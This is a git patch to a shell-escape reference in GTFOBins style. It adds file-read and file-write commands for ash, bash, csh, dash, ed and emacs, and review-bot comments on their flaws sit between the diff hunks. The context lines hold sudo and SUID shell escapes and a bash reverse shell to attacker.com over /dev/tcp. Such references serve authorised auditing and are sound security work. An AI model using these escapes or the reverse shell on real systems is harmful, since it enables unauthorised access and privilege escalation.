From 66b617c9552ed5473eadcdedb7d02a61a57ca01d Mon Sep 17 00:00:00 2001
From: Emilio Pinna
Date: Mon, 28 May 2018 18:09:16 +0100
Subject: [PATCH] Add read/write for ash, bash, csh, dash, ed, and emacs
---
 _gtfobins/ash.md | 4 ++++
 _gtfobins/bash.md | 9 +++++++++
 _gtfobins/csh.md | 4 ++++
 _gtfobins/dash.md | 4 ++++
 _gtfobins/ed.md | 7 +++++++
 _gtfobins/emacs.md | 7 +++++++
 6 files changed, 35 insertions(+)
diff --git a/_gtfobins/ash.md b/_gtfobins/ash.md
index 8963e7a..eb597b6 100644
--- a/_gtfobins/ash.md
+++ b/_gtfobins/ash.md
@@ -6,4 +6,8 @@ functions:
 - code: sudo ash
 suid-enabled:
 - code: ./ash
+ file-write:
+ - code: |
+ export LFILE=file_to_write
+ ash -c 'echo data > $LFILE'
 ---
diff --git a/_gtfobins/bash.md b/_gtfobins/bash.md
index 4eb23cf..f65ca98 100644
--- a/_gtfobins/bash.md
+++ b/_gtfobins/bash.md
@@ -40,4 +40,13 @@ functions:
 export RHOST=attacker.com
 export RPORT=12345
 bash -c 'bash -i >& /dev/tcp/$RHOST/$RPORT 0>&1'
+ file-read:
+ - description: It trims trailing newlines.
+ code: |
+ export LFILE=file_to_read
+ bash -c 'echo "$(<$LFILE)"'
+ - description: It trims trailing newlines.
+ code: |
+ export LFILE=file_to_read
+ bash -c $'read -d \x04 a < "$LFILE"; echo "$a"'
 ---
diff --git a/_gtfobins/csh.md b/_gtfobins/csh.md
index a112601..aa5b1e3 100644
--- a/_gtfobins/csh.md
+++ b/_gtfobins/csh.md
@@ -6,4 +6,8 @@ functions:
 - code: sudo csh
 suid-enabled:
 - code: ./csh -b
+ file-write:
+ - code: |
+ export LFILE=file_to_write
+ ash -c 'echo data > $LFILE'
 ---
diff --git a/_gtfobins/dash.md b/_gtfobins/dash.md
index 8b93d4d..0e61b02 100644
--- a/_gtfobins/dash.md
+++ b/_gtfobins/dash.md
@@ -6,4 +6,8 @@ functions:
 - code: sudo dash
 suid-enabled:
 - code: ./dash -p
+ file-write:
+ - code: |
+ export LFILE=file_to_write
+ ash -c 'echo data > $LFILE'
 ---
diff --git a/_gtfobins/ed.md b/_gtfobins/ed.md
index b85d737..a8d2d56 100644
--- a/_gtfobins/ed.md
+++ b/_gtfobins/ed.md
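Review bot: The `file-write` entry added to `_gtfobins/ash.md` has no `description`, although the `file-read` entries this same patch adds to `bash.md` do document their output quirks. As written, `>` truncates an existing `$LFILE` and `echo` appends a newline after `data`, and neither effect is stated. I would add `description: It overwrites the file and appends a trailing newline.` to the entry. The same gap exists in the `file-write` entries added to `csh.md` and `dash.md`.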
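Review bot: In `_gtfobins/bash.md` the second `file-read` entry reuses the description `It trims trailing newlines.`, which understates what the command does. `read` is called without `-r` and with the default `IFS`, so it also consumes backslashes, strips leading whitespace, and stops at the first 0x04 byte in the file. The description should say so, for example `description: It trims leading and trailing whitespace, interprets backslashes and stops at the first EOT byte.`. Separately, the first entry leaves `$LFILE` unquoted inside `$(<$LFILE)` while the second quotes it. Writing `"$(<"$LFILE")"` would make the two consistent and should avoid bash's ambiguous-redirect error on names containing spaces.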
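Review bot: The `file-write` entries added to `_gtfobins/csh.md` and `_gtfobins/dash.md` both run `ash -c 'echo data > $LFILE'`, apparently copied from `ash.md`, so neither page exercises the binary it documents. Anyone using these pages to assess a `csh` or `dash` sudo/SUID grant would be testing `ash` instead, or would get a command-not-found error on hosts without `ash`. The lines should read `csh -c 'echo data > $LFILE'` and `dash -c 'echo data > $LFILE'` respectively.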
@@ -12,4 +12,11 @@ functions:
 - code: |-
 ./ed
 !/bin/sh
+ file-read:
+ - code: |
+ ed file_to_read
+ file-write:
+ - code: |
+ ed file_to_write
+ w
 ---
diff --git a/_gtfobins/emacs.md b/_gtfobins/emacs.md
index b8bc630..9dc17e0 100644
--- a/_gtfobins/emacs.md
+++ b/_gtfobins/emacs.md
@@ -6,4 +6,11 @@ functions:
 - code: sudo emacs -Q -nw --eval '(term "/bin/sh")'
 suid-enabled:
 - code: ./emacs -Q -nw --eval '(term "/bin/sh -p")'
+ file-read:
+ - code: |
+ emacs file_to_read
+ file-write:
+ - code: |
+ emacs file_to_write
+ C-x C-s
 ---
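Review bot: In `_gtfobins/ed.md` neither new entry is complete enough to do what its key claims. `ed file_to_read` on its own only reports the byte count of the loaded file, because nothing is printed until a print command such as `,p` is issued. The `file-write` listing opens the file and issues `w` without entering any text, so it writes back whatever was loaded. Neither listing leaves the editor. I would add `,p` and `q` to the read entry, put an `a` … `.` input block before `w` in the write entry, and end that one with `q` as well.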
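Review bot: In `_gtfobins/emacs.md` the `file-write` block puts `C-x C-s` on its own line inside `code: |`, where it reads as literal text to type, but it is a key chord (Ctrl-x then Ctrl-s). By contrast, the `w` line in `ed.md` really is typed input. The new entries also drop the `-Q -nw` flags used by the existing entries in this hunk's context lines, so they load the user's init files and may open a GUI frame rather than staying in the terminal. I would use `emacs -Q -nw file_to_read` and `emacs -Q -nw file_to_write`, and move the chord into a `description:` such as `description: Save the buffer with C-x C-s.`.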